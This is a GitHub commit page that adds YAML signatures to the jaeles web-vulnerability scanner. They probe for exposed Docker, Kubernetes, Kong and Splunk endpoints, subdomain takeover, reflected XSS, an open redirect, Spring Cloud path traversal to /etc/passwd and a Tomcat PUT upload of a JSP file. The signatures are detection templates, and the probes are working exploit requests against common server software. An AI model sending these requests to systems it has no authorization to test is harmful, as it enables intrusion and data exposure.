forked from jaeles-project/jaeles-signatures
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
16 changed files
with
1,051 additions
and
16 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,25 @@ | ||
| # info to search signature | ||
| id: docker-unauth-01 | ||
| info: | ||
| name: Docker Registry Exposed | ||
| risk: High | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/v2/ | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "registry/2.0") && StringSearch("response", "docker-distribution-api-version") | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/v2/_catalog | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "repositories") | ||
| reference: | ||
| - link: http://www.polaris-lab.com/index.php/archives/253/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # info to search signature | ||
| id: docker-unauth-01 | ||
| info: | ||
| name: K8S API Exposed | ||
| risk: High | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/info | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "KernelVersion") && StringSearch("response", "RegistryConfig") | ||
| reference: | ||
| - link: https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: nginx-vhost-xss-01 | ||
| info: | ||
| name: Nginx Vhost RXSS | ||
| risk: Medium | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}' | ||
|
|
||
| variables: | ||
| - stats: | | ||
| nginx-status.html | ||
| status.html | ||
| _zstats | ||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 | ||
| url: >- | ||
| {{.root}}/{{.stats}}"-prompt(1)-" | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "nginx vhost traffic") && StringSearch("response", "-prompt(1)-") | ||
| reference: | ||
| - author: j3ssie |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,29 @@ | ||
| id: jira-service-desk-signup | ||
| info: | ||
| name: Jira service desk signup Exposed | ||
| risk: Medium | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}' | ||
|
|
||
| variables: | ||
| - prefix: | | ||
| / | ||
| /jira/ | ||
| /wiki/ | ||
| /confluence/ | ||
| /desk/ | ||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.root}}{{.prefix}}servicedesk/customer/user/signup | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", 'Service Desk') && StringSearch("response", 'public.signup') | ||
| reference: | ||
| - link: https://medium.com/@intideceukelaire/hundreds-of-internal-servicedesks-exposed-due-to-covid-19-ecd0baec87bd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,98 @@ | ||
| id: subdomain-takeover-01 | ||
| info: | ||
| name: Subdomain Takeover | ||
| risk: High | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}' | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 | ||
| url: >- | ||
| {{.root}} | ||
| detections: | ||
| - >- | ||
| StringSearch("response", "github") && StringSearch("response", "There isn't a GitHub Pages site here.") | ||
| - >- | ||
| StringSearch("response", "github") && StringSearch("response", "For root URLs (like http://example.com/) you must provide an index.html file") | ||
| - >- | ||
| StringSearch("response", "heroku") && StringSearch("response", "There's nothing here") | ||
| - >- | ||
| StringSearch("response", "heroku") && StringSearch("response", "No such app") | ||
| - >- | ||
| StringSearch("response", "tumblr.com") && StringSearch("response", "There's nothing here.") | ||
| - >- | ||
| StringSearch("response", "tumblr.com") && StringSearch("response", "Whatever you were looking for doesn't currently exist at this address") | ||
| - >- | ||
| StringSearch("response", "myshopify.com") && StringSearch("response", "Only one step left!") | ||
| - >- | ||
| StringSearch("response", "pageserve.co") && StringSearch("response", "You've Discovered A Missing Link. Our Apologies!") | ||
| - >- | ||
| StringSearch("response", "tictail.com") && StringSearch("response", "Building a brand of your own?") | ||
| - >- | ||
| StringSearch("response", "createsend.com") && StringSearch("response", "Trying to access your account?") | ||
| - >- | ||
| StringSearch("response", "cargocollective.com") && StringSearch("response", "404 Not Found") | ||
| - >- | ||
| StringSearch("response", "pantheon.io") && StringSearch("response", "404 error unknown site") | ||
| - >- | ||
| StringSearch("response", "fly.io") && StringSearch("response", "404 Not Found") | ||
| - >- | ||
| StringSearch("response", "uptimerobot.com") && StringSearch("response", "page not found") | ||
| - >- | ||
| StringSearch("response", "strikinglydns.com") && StringSearch("response", "page not found") | ||
| - >- | ||
| StringSearch("response", "tilda.cc") && StringSearch("response", "Please renew your subscription") | ||
| - >- | ||
| StringSearch("response", "azurewebsites.net") && StringSearch("response", "404 Web Site not found") | ||
| - >- | ||
| StringSearch("response", "amazonaws.com") && StringSearch("response", "NoSuchBucket") | ||
| - >- | ||
| StringSearch("response", "amazonaws.com") && StringSearch("response", "The specified bucket does not exist") | ||
| - >- | ||
| StringSearch("response", "smartling.com") && StringSearch("response", "Domain is not configured") | ||
| - >- | ||
| StringSearch("response", "acquia.com") && StringSearch("response", "If you are an Acquia Cloud customer and expect to see your site at this address") | ||
| - >- | ||
| StringSearch("response", "fastly.net") && StringSearch("response", "Please check that this domain has been added to a service") | ||
| - >- | ||
| StringSearch("response", "fastly.net") && StringSearch("response", "Fastly error: unknown domain:") | ||
| - >- | ||
| StringSearch("response", "pantheonsite.io") && StringSearch("response", "The gods are wise") | ||
| - >- | ||
| StringSearch("response", "uservoice.com") && StringSearch("response", "This UserVoice subdomain is currently available!") | ||
| - >- | ||
| StringSearch("response", "ghost.io") && StringSearch("response", "The thing you were looking for is no longer here") | ||
| - >- | ||
| StringSearch("response", "stats.pingdom.com") && StringSearch("response", "pingdom") | ||
| - >- | ||
| StringSearch("response", "redirect.feedpress.me") && StringSearch("response", "The feed has not been found") | ||
| - >- | ||
| StringSearch("response", "helpjuice.com") && StringSearch("response", "We could not find what you're looking for.") | ||
| - >- | ||
| StringSearch("response", "surge.sh") && StringSearch("response", "project not found") | ||
| - >- | ||
| StringSearch("response", "privatedomain.surveygizmo.eu") && StringSearch("response", "data-html-name") | ||
| - >- | ||
| StringSearch("response", "wordpress") && StringSearch("response", "Domain mapping upgrade for this domain not found") | ||
| - >- | ||
| StringSearch("response", "wordpress") && StringSearch("response", "Do you want to register *.wordpress.com?") | ||
| - >- | ||
| StringSearch("response", "bitbucket.io") && StringSearch("response", "Repository not found") | ||
| - >- | ||
| StringSearch("response", "helpscoutdocs.com") && StringSearch("response", "No settings were found for this company:") | ||
| - >- | ||
| StringSearch("response", "myjetbrains.com") && StringSearch("response", "is not a registered InCloud YouTrack") | ||
| - >- | ||
| StringSearch("response", "readme.io") && StringSearch("response", "Project doesnt exist... yet!") | ||
| - >- | ||
| StringSearch("response", "kinsta.com") && StringSearch("response", "No Site For Domain") | ||
| - >- | ||
| StringSearch("response", "intercom.io") && StringSearch("response", "Uh oh. That page doesn't exist.") | ||
| - >- | ||
| StringSearch("response", "launchrock.com") && StringSearch("response", "It looks like you may have taken a wrong turn somewhere") | ||
| - >- | ||
| StringSearch("response", "mashery.com") && StringSearch("response", "Unrecognized domain") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,28 @@ | ||
| id: wordpress-directory-listing-01 | ||
| info: | ||
| name: Multiples Wordpress Directory Listing | ||
| risk: Medium | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}/' | ||
|
|
||
| variables: | ||
| - vul: | | ||
| wp-includes/ | ||
| wp-includes/images/ | ||
| wp-content/ | ||
| wp-content/themes/ | ||
| wp-content/plugins/ | ||
| wp-content/plugins/hustle/views/admin/dashboard/ | ||
| wp-admin/ | ||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.root}}{{.vul}} | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "Index of /") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: kong-cve-2020-11710 | ||
| info: | ||
| name: Kong Admin API | ||
| risk: High | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}' | ||
|
|
||
| variables: | ||
| - end: | | ||
| / | ||
| /status | ||
| requests: | ||
| - method: GET | ||
| url: >- | ||
| {{.root}}{{.end}} | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "kong_env") | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss") | ||
| reference: | ||
| - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| id: splunk-cve-01 | ||
| info: | ||
| name: Splunk Licencse Exposed - CVE-2018-11409 | ||
| risk: Medium | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "application/json") && StringSearch("response", "licenseKeys") | ||
| reference: | ||
| - link: https://www.splunk.com/view/SP-CAAAP5E |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,29 @@ | ||
| # info to search signature | ||
| id: spring-cve-03 | ||
| info: | ||
| name: Spring Cloud CVE-2020-5405 | ||
| risk: High | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}' | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.root}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash") | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.root}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch("response", "This file is managed by man:systemd-resolved(8)") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,22 @@ | ||
| # info to search signature | ||
| id: cve-tomcat-01 | ||
| info: | ||
| name: Tomcat JK Status - CVE-2018-11759 | ||
| risk: High | ||
|
|
||
| params: | ||
| - root: '{{.BaseURL}}/' | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.root}}jkstatus | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch('response', 'JK Status Manger') | ||
| reference: | ||
| - link: https://www.immunit.ch/blog/2018/11/01/cve-2018-11759-apache-mod_jk-access-bypass/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| id: cve-tomcat-04 | ||
| info: | ||
| name: Tomcat Open Redirect - CVE-2018-11784 | ||
| risk: High | ||
|
|
||
| requests: | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}//google.com | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}') | ||
| reference: | ||
| - link: https://github.com/breaktoprotect/CVE-2017-12615 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| # info to search signature | ||
| id: cve-tomcat-03 | ||
| info: | ||
| name: Tomcat PUT method allowed - CVE-2017-12615 | ||
| risk: High | ||
|
|
||
| variables: | ||
| - ran: RandomString(6) | ||
|
|
||
|
|
||
| requests: | ||
| - method: PUT | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/{{.ran}}.jsp/ | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| body: | | ||
| <% out.write("<html><body><h3>JSP uploaded</h3></body></html>"); %> | ||
| # verify request | ||
| - method: GET | ||
| redirect: false | ||
| url: >- | ||
| {{.BaseURL}}/{{.ran}}.jsp | ||
| headers: | ||
| - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
| detections: | ||
| - >- | ||
| StatusCode() == 200 && StringSearch('response', 'JSP uploaded') | ||
| reference: | ||
| - link: https://github.com/breaktoprotect/CVE-2017-12615 |
Oops, something went wrong.